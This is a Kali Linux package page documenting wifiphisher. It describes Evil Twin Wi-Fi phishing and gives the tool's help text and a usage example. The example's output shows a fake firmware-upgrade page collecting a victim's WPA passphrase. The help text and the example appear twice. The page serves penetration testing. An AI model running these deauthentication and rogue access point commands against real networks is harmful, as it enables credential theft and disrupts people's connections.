wifiphisher Package Description
Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victim’s perspective, the attack takes place in three phases:
- Victim is deauthenticated from their access point.
- Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
- Victim is served a realistic specially-customized phishing page.
Source: https://wifiphisher.org/docs.html
wifiphisher Homepage | Kali wifiphisher Repo
- Author: sophron
- License: GPLv3
Tools included in the wifiphisher package
wifiphisher – Automated phishing attacks against Wi-Fi networks
root@kali:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
[-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
[-T TEMPLATE] [-pK PRESHAREDKEY]
optional arguments:
-h, --help show this help message and exit
-s SKIP, --skip SKIP Skip deauthing this MAC address. Example: -s
00:11:BB:33:44:AA
-jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
Choose monitor mode interface. By default script will
find the most powerful interface and starts monitor
mode on it. Example: -jI mon5
-aI APINTERFACE, --apinterface APINTERFACE
Choose access point interface. By default script will
find the most powerful interface and starts an access
point on it. Example: -aI wlan0
-t TIMEINTERVAL, --timeinterval TIMEINTERVAL
Choose the time interval between packets being sent.
Default is as fast as possible. If you see scapy
errors like 'no buffer space' try: -t .00001
-p PACKETS, --packets PACKETS
Choose the number of packets to send in each deauth
burst. Default value is 1; 1 packet to the client and
1 packet to the AP. Send 2 deauth packets to the
client and 2 deauth packets to the AP: -p 2
-d, --directedonly Skip the deauthentication packets to the broadcast
address ofthe access points and only send them to
client/AP pairs
-nJ, --nojamming Skip the deauthentication phase.
-e ESSID, --essid ESSID
Enter the ESSID of the rogue access point (Evil Twin)
This will skip Access Point selection phase.
-T TEMPLATE, --template TEMPLATE
Choose the template to run.Using this option will skip
the interactive selection
-pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
Add WPA/WPA2 protection on the rogue Access Point
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
[-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
[-T TEMPLATE] [-pK PRESHAREDKEY]
optional arguments:
-h, --help show this help message and exit
-s SKIP, --skip SKIP Skip deauthing this MAC address. Example: -s
00:11:BB:33:44:AA
-jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
Choose monitor mode interface. By default script will
find the most powerful interface and starts monitor
mode on it. Example: -jI mon5
-aI APINTERFACE, --apinterface APINTERFACE
Choose access point interface. By default script will
find the most powerful interface and starts an access
point on it. Example: -aI wlan0
-t TIMEINTERVAL, --timeinterval TIMEINTERVAL
Choose the time interval between packets being sent.
Default is as fast as possible. If you see scapy
errors like 'no buffer space' try: -t .00001
-p PACKETS, --packets PACKETS
Choose the number of packets to send in each deauth
burst. Default value is 1; 1 packet to the client and
1 packet to the AP. Send 2 deauth packets to the
client and 2 deauth packets to the AP: -p 2
-d, --directedonly Skip the deauthentication packets to the broadcast
address ofthe access points and only send them to
client/AP pairs
-nJ, --nojamming Skip the deauthentication phase.
-e ESSID, --essid ESSID
Enter the ESSID of the rogue access point (Evil Twin)
This will skip Access Point selection phase.
-T TEMPLATE, --template TEMPLATE
Choose the template to run.Using this option will skip
the interactive selection
-pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
Add WPA/WPA2 protection on the rogue Access Point
wifiphisher Usage Examples
Do not perform jamming (-nJ), create a wireless access point (-e “Free Wi-Fi”) and present a fake firmware upgrade to clients (-T firmware-upgrade). When a client connects, they a presented with a webpage to enter the PSK of their network:
root@kali:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
Jamming devices:
DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3
HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
Jamming devices:
DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3
HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93